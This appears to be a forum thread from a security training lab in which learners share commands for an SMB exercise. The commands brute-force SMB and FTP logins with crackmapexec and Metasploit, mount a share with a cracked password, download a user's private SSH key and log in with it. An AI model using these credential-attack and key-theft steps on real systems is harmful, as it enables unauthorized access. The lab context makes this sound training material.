Everytime i downloads GGL/id_rsa i get an empty file. Any help on how I can complete last question. I have jason’s password
Ok so I was stuck on this for a while. I found the answer not from the module, I utilized ChatGpt it wasnt the most helpful but did lead me to get my answer. This is for question 3, so I am already assuming you have jason PW…use the following command to mount the G** share for the id_rsa.
sudo mount -t cifs //10.129.216.52/GGJ /mnt/smb_htb -o username=jason,password=‘PWFORJASON’,ro
the ro at the end is for read only
Once the id_rsa is mounted to whatever path you decided use this command to copy it to home directory
cp /mnt/smb_htb/id_rsa ~/id_rsa
then very important,
chmod 600 ~/id_rsa
then to sign into ssh with private key use
ssh -i ~/id_rsa jason@10.129.216.52
Hope this helps.
1 Like
for point 3:
yo must use smbmap -u jason -p ‘xxxxxx’ -d GXX -h 10.129.xx.xx --download “Gxx\id_rsa”
chmod 600 id_rsa
and login on ssh server with flag -i id_rsa
your welcome! 
2 Likes
im stuck on this, so do i download the id_rsa file using
smbmap -H 10.129.203.6 -u jason -p password.txt --download GGJ\id_rsa from there do i then use the command you did to mount then change permissions then sign in?
Hi I tried this but I am stuck 
┌──(venv)─(kali㉿kali)-[/opt/CrackMapExec]
└─$ poetry run crackmapexec --verbose smb 10.129.92.239 --user jason -p /home/kali/Desktop/pws.list -d ATTCSVC-LINUX
[08:12:40] INFO Socket info: host=10.129.92.239, hostname=10.129.92.239, kerberos=False connection.py:95
[08:12:42] INFO Error creating SMBv1 connection to 10.129.92.239: (‘unpack requires a buffer of 1 bytes’, “When unpacking field ‘SecurityMode | <B | b’‘[:1]’”) smb.py:599
[08:12:45] INFO Error creating SMBv3 connection to 10.129.92.239: The NETBIOS connection with the remote host timed out.
Still stucked
┌──(venv)─(kali㉿kali)-[/opt/CrackMapExec]
└─$ poetry run crackmapexec --verbose ftp 10.129.203.6 -u jason -p /home/kali/Desktop/pws.list --port 2121
[12:07:41] INFO Socket info: host=10.129.203.6, hostname=10.129.203.6, kerberos=False
I having alot of trouble with this box, I keep receiving a NT_STATUS_IO_TIMEOUT, and on the rare times I managed to connect Im unable to download the id_rsa file.
Try installing crackmapexec with pip and git here is the command you can use for that:
pip3 install git+https://github.com/Porchetta-Industries/CrackMapExec
This will take poetry out of the way and in my opinion makes the learning experience a little easier.
After CME is installed this way I found this syntax to work quite well without specifying domain but using --local-auth as mentioned above.
crackmapexec smb 10.129.101.59 -u j**** -p /path/to/wordlist --local-auth
Not saying one way is necessarily better than the other, this is just what worked for me. Hope this helps.
Hello Friend:
For those like me who don’t have CME working in the HTB lab, you can do exercise 2 with metasploit using the smb_login module.
Commands:
msfconsole -q
use auxiliary/scanner/smb/smb_login
set RHOST 10.129.190.47
set SMBUSER jason
set PASS_FILE Desktop/pws.list
set VERBOSE false
exploit
Important: use pws.list from resources.
Happy Hacking!